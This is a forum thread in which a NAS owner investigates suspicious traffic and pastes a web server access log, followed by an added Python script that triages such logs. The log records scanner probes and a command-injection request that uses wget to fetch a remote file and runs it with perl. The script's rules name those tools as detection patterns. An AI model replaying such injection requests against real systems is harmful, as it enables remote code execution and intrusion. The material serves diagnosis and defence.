WKYoung
Aspirant
Feb 04, 2012

How do I find out who is accessing data on my NAS?

I have noticed on several occasions recently a large amount of traffic streaming from my NAS to the router. I am not aware of any local processes running at the time this happens as all PCs are shut down.

As a "security" measure I have unplugged the link when I see this happening. Is there anything I can do to find out what process/user/device is actually doing this? It is a little disconcerting that data may be streaming out to somewhere outside my LAN without my knowledge. The NAS has CIFS/DLNA/FTP enabled. FTP is for named users only and only Group and Users are enabled in Advanced settings with valid users itemised in specific shares. Accessing as different users does reveal only those shares specified. No "Anonymous" access is granted.

Can anyone advise me as to how to find out who/what is happening???

This is a second attempt to get a response to this question.

6 Replies

  • StephenB
    Guru - Experienced User
    Perhaps your router has logs? Also as far as "security" measures, some routers let you control internet access by time of day. If you are using standard ports for FTP, you might change them to non-standard ports. Changing user passwords might also be a good idea.

    Are the users on your home network or are they remote?
  • Thanks for responding Stephen!
    Users are remote, scattered around Europe. Most data is encrypted and user passwords are quite restrictive. I cannot see any log relating to access nor can I find any means of enabling logging for user accesses. I am unable to time-limit users as this would affect work. NAS is 8TB Ultra 4+
  • StephenB
    Guru - Experienced User
    ok. So it is possible that the access is legitimate?

    Also, are the remote users using FTP or ReadyNAS Remote (or both)?

    I am not aware of a way to see user logons, I agree these should be logged somewhere.
  • mdgm-ntgr
    NETGEAR Employee Retired
    There should be a log (ftp.log I think) in the logs zip file (Status > Logs > Download all logs) with the information you need. I think there's an FTPWHO community add-on as well which you may find useful.

    If you have SSH access you can look at /var/log/proftpd.log (this is the ftp log included in the logs zip file).
  • Access is through FTP. Users are defined for specific shares.


    Yes! There should be a log for users accessing the system but I cannot find it.
  • I read the FTP log and found it to contain nothing of relevance. All logins were valid.

    Here is part of the HTTPD Log. It makes for interesting reading I am sure but can anyone tell me what it is saying? There are a lot of strange IP addresses hitting the system (if that is what it is saying) but HTTP is not enabled for any share. I can recognize Google and aiHit plus DNS services but who are the rest and what are they doing?

    Any info would be useful.

    112.197.2.15 - - [29/Jan/2012:20:32:59 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 302 247 "-" "ZmEu"
    112.197.2.15 - - [29/Jan/2012:20:32:59 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 231 "-" "ZmEu"
    112.197.2.15 - - [29/Jan/2012:20:33:00 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 234 "-" "ZmEu"
    ::1 - - [29/Jan/2012:20:33:01 +0000] "GET /" 400 456 "-" "-"
    61.250.80.133 - - [29/Jan/2012:21:44:30 +0000] "GET /user/soapCaller.bs HTTP/1.1" 302 224 "-" "Morfeus Fucking Scanner"
    204.8.135.12 - - [30/Jan/2012:04:27:40 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
    62.117.99.45 - - [30/Jan/2012:04:43:33 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
    207.109.164.19 - - [30/Jan/2012:05:20:24 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
    210.42.74.40 - - [30/Jan/2012:05:32:06 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
    64.139.216.71 - - [30/Jan/2012:18:56:52 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
    95.108.247.252 - - [30/Jan/2012:19:07:33 +0000] "GET /robots.txt HTTP/1.1" 302 218 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
    218.201.87.23 - - [30/Jan/2012:19:16:00 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
    77.222.128.221 - - [31/Jan/2012:01:33:34 +0000] "GET /robots.txt HTTP/1.1" 302 222 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
    77.222.128.221 - - [31/Jan/2012:01:33:36 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
    77.222.128.221 - - [31/Jan/2012:01:33:37 +0000] "GET / HTTP/1.1" 302 212 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
    77.222.128.221 - - [31/Jan/2012:01:33:38 +0000] "GET / HTTP/1.1" 200 115 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
    77.222.128.221 - - [31/Jan/2012:01:33:39 +0000] "GET /shares/ HTTP/1.1" 401 401 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
    ::1 - - [31/Jan/2012:01:33:41 +0000] "GET /" 400 456 "-" "-"
    95.108.247.252 - - [31/Jan/2012:02:50:35 +0000] "GET / HTTP/1.1" 302 208 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
    193.40.1.220 - - [31/Jan/2012:02:55:00 +0000] "GET / HTTP/1.1" 302 206 "-" "Python-urllib/2.6"
    193.40.1.220 - - [31/Jan/2012:02:55:00 +0000] "GET / HTTP/1.1" 200 115 "-" "Python-urllib/2.6"
    66.249.72.142 - - [31/Jan/2012:03:51:45 +0000] "GET /robots.txt HTTP/1.1" 302 218 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    66.249.72.178 - - [31/Jan/2012:03:51:45 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    66.249.72.142 - - [31/Jan/2012:03:51:45 +0000] "GET / HTTP/1.1" 302 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    66.249.72.178 - - [31/Jan/2012:03:51:45 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    66.249.72.178 - - [31/Jan/2012:03:51:45 +0000] "GET / HTTP/1.1" 200 115 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    66.249.72.178 - - [31/Jan/2012:03:51:46 +0000] "GET /shares/ HTTP/1.1" 401 401 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    ::1 - - [31/Jan/2012:03:51:50 +0000] "GET /" 400 456 "-" "-"
    203.234.219.77 - - [31/Jan/2012:04:06:15 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
    193.40.1.220 - - [31/Jan/2012:06:29:01 +0000] "GET / HTTP/1.1" 302 206 "-" "Python-urllib/2.6"
    193.40.1.220 - - [31/Jan/2012:06:29:01 +0000] "GET / HTTP/1.1" 200 115 "-" "Python-urllib/2.6"
    66.249.72.218 - - [31/Jan/2012:06:40:13 +0000] "GET /robots.txt HTTP/1.1" 302 222 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    66.249.72.69 - - [31/Jan/2012:06:40:15 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    66.249.72.218 - - [31/Jan/2012:06:40:15 +0000] "GET / HTTP/1.1" 302 212 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    66.249.72.69 - - [31/Jan/2012:06:40:15 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    66.249.72.69 - - [31/Jan/2012:06:40:15 +0000] "GET / HTTP/1.1" 200 115 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    66.249.72.69 - - [31/Jan/2012:06:40:15 +0000] "GET /shares/ HTTP/1.1" 401 401 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    ::1 - - [31/Jan/2012:06:40:18 +0000] "GET /" 400 456 "-" "-"
    ::1 - - [31/Jan/2012:06:40:19 +0000] "GET /" 400 456 "-" "-"
    92.39.50.14 - - [31/Jan/2012:11:50:20 +0000] "GET /wp-login.php HTTP/1.0" 302 220 "-" "-"
    66.249.72.178 - - [31/Jan/2012:12:20:16 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    66.249.72.178 - - [31/Jan/2012:12:20:17 +0000] "GET /shares/ HTTP/1.1" 401 401 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    207.46.204.224 - - [31/Jan/2012:22:58:15 +0000] "GET /robots.txt HTTP/1.1" 302 218 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    207.46.204.224 - - [31/Jan/2012:22:58:16 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    207.46.204.224 - - [31/Jan/2012:22:59:13 +0000] "GET /shares/ HTTP/1.1" 302 215 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    207.46.204.224 - - [31/Jan/2012:22:59:14 +0000] "GET /shares/ HTTP/1.1" 401 401 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    202.99.122.185 - - [01/Feb/2012:04:01:11 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
    192.168.1.25 - - [01/Feb/2012:14:48:14 +0000] "GET /admin/ HTTP/1.1" 302 211 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"
    ::1 - - [01/Feb/2012:14:48:17 +0000] "GET /" 400 456 "-" "-"
    70.161.177.214 - - [02/Feb/2012:02:29:51 +0000] "GET /robots.txt HTTP/1.1" 302 222 "-" "panscient.com"
    70.161.177.214 - - [02/Feb/2012:02:29:51 +0000] "GET / HTTP/1.1" 302 212 "-" "panscient.com"
    61.183.23.146 - - [02/Feb/2012:19:50:54 +0000] "HEAD /manager/html HTTP/1.0" 302 - "-" "-"
    65.52.108.142 - - [03/Feb/2012:01:00:39 +0000] "GET /robots.txt HTTP/1.1" 302 218 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    65.52.108.142 - - [03/Feb/2012:01:00:40 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    65.52.108.142 - - [03/Feb/2012:01:01:12 +0000] "GET / HTTP/1.1" 302 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    65.52.108.142 - - [03/Feb/2012:01:01:12 +0000] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    95.108.245.253 - - [03/Feb/2012:01:33:26 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
    78.29.15.137 - - [03/Feb/2012:06:46:04 +0000] "POST /admin/login.php HTTP/1.1" 302 223 "-" "-"
    95.108.245.253 - - [03/Feb/2012:07:53:40 +0000] "GET / HTTP/1.1" 200 115 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
    65.39.251.195 - - [03/Feb/2012:15:33:13 +0000] "HEAD / HTTP/1.0" 302 - "-" "-"
    67.212.72.210 - - [04/Feb/2012:01:06:15 +0000] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    67.212.72.210 - - [04/Feb/2012:01:06:15 +0000] "GET /recordings/index.php HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    91.209.192.31 - - [04/Feb/2012:01:25:16 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/ieh1%20http://abctel.nl/i.txt HTTP/1.1" 302 332 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
    91.209.192.31 - - [04/Feb/2012:01:25:31 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/i.txt HTTP/1.1" 302 284 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
    91.209.192.31 - - [04/Feb/2012:01:25:31 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/i.txt HTTP/1.1" 302 284 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
    91.209.192.31 - - [04/Feb/2012:01:25:31 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/i.txt HTTP/1.1" 302 284 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
    91.209.192.31 - - [04/Feb/2012:01:25:32 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/i.txt HTTP/1.1" 302 284 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
    91.209.192.31 - - [04/Feb/2012:01:25:32 +0000] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=perl%20/tmp/i.txt HTTP/1.1" 302 284 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
    ::1 - - [04/Feb/2012:01:25:33 +0000] "GET /" 400 456 "-" "-"
    ::1 - - [04/Feb/2012:01:25:34 +0000] "GET /" 400 456 "-" "-"
    ::1 - - [04/Feb/2012:01:25:35 +0000] "GET /" 400 456 "-" "-"
    94.24.40.205 - - [04/Feb/2012:07:38:44 +0000] "GET /admin/cdr/counter.txt HTTP/1.1" 401 401 "-" "-"
    200.196.48.40 - - [04/Feb/2012:09:49:01 +0000] "GET //README HTTP/1.1" 302 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:01 +0000] "GET /horde//README HTTP/1.1" 302 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:02 +0000] "GET /horde2//README HTTP/1.1" 302 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:03 +0000] "GET /horde3//README HTTP/1.1" 302 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:03 +0000] "GET /horde-3.0.5//README HTTP/1.1" 302 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:04 +0000] "GET /horde-3.0.6//README HTTP/1.1" 302 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:04 +0000] "GET /horde-3.0.7//README HTTP/1.1" 302 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:05 +0000] "GET /horde-3.0.8//README HTTP/1.1" 302 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:06 +0000] "GET /horde-3.0.9//README HTTP/1.1" 302 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:06 +0000] "GET /mail//README HTTP/1.1" 302 219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:07 +0000] "GET /email//README HTTP/1.1" 302 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:07 +0000] "GET /webmail//README HTTP/1.1" 302 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:08 +0000] "GET /newmail//README HTTP/1.1" 302 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:08 +0000] "GET /mails//README HTTP/1.1" 302 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    200.196.48.40 - - [04/Feb/2012:09:49:09 +0000] "GET /mailz//README HTTP/1.1" 302 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
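
An added example (not part of the original thread): a short Python triage of an access log in this format. It separates self-declared crawlers, vulnerability-scanner probes and command-injection attempts, and lists which external requests were answered with 200. The sample lines are constructed, using documentation-range addresses and a placeholder host; the rule patterns and function names are this example's own choices.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format, the layout of the excerpt above.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# (label, field, pattern); first match wins. Heuristics for this example only.
RULES = [
    ('command-injection attempt', 'path', r'[?&]cmd=|\b(wget|curl|perl)\s'),
    ('vulnerability scan', 'ua', r'zmeu|morfeus'),
    ('vulnerability scan', 'path', r'w00tw00t|setup\.php|wp-login\.php|/manager/html'),
    ('crawler (User-Agent claim, unverified)', 'ua', r'googlebot|bingbot|yandexbot|aihitbot'),
]
LOCAL_PREFIXES = ('::1', '127.', '192.168.')  # loopback and this LAN

# Constructed sample lines modelled on the excerpt; addresses are documentation ranges.
SAMPLE = [
    '198.51.100.7 - - [29/Jan/2012:20:32:59 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 234 "-" "ZmEu"',
    '203.0.113.9 - - [31/Jan/2012:03:51:45 +0000] "GET / HTTP/1.1" 200 115 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '203.0.113.9 - - [31/Jan/2012:03:51:46 +0000] "GET /shares/ HTTP/1.1" 401 401 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '192.0.2.44 - - [04/Feb/2012:01:25:16 +0000] "GET //p_/x/os/popen2?cmd=wget%20http://example.invalid/i.txt HTTP/1.1" 302 332 "-" "-"',
    '::1 - - [04/Feb/2012:01:25:33 +0000] "GET /" 400 456 "-" "-"',
]

def classify(line):
    """Parse one log line; return None if it is not in combined format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parts = m['req'].split()
    fields = {'path': unquote(parts[1]) if len(parts) > 1 else '', 'ua': m['ua']}
    if m['ip'].startswith(LOCAL_PREFIXES):
        kind = 'local'
    else:
        kind = next((k for k, f, rx in RULES if re.search(rx, fields[f], re.I)), 'other')
    return {'ip': m['ip'], 'path': fields['path'], 'status': int(m['status']), 'kind': kind}

def summarize(lines):
    """Map (ip, kind) to the sorted HTTP status codes that source received."""
    out = {}
    for rec in filter(None, map(classify, lines)):
        out.setdefault((rec['ip'], rec['kind']), set()).add(rec['status'])
    return {key: sorted(codes) for key, codes in out.items()}

def served_content(lines):
    """Non-local requests answered 200: the server returned a page, review these first."""
    return [r for r in filter(None, map(classify, lines))
            if r['status'] == 200 and r['kind'] != 'local']
```

A User-Agent is whatever the client chooses to send, so the crawler label is a claim rather than an identification. A 302 or 401 shows only how the web server answered that one request.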
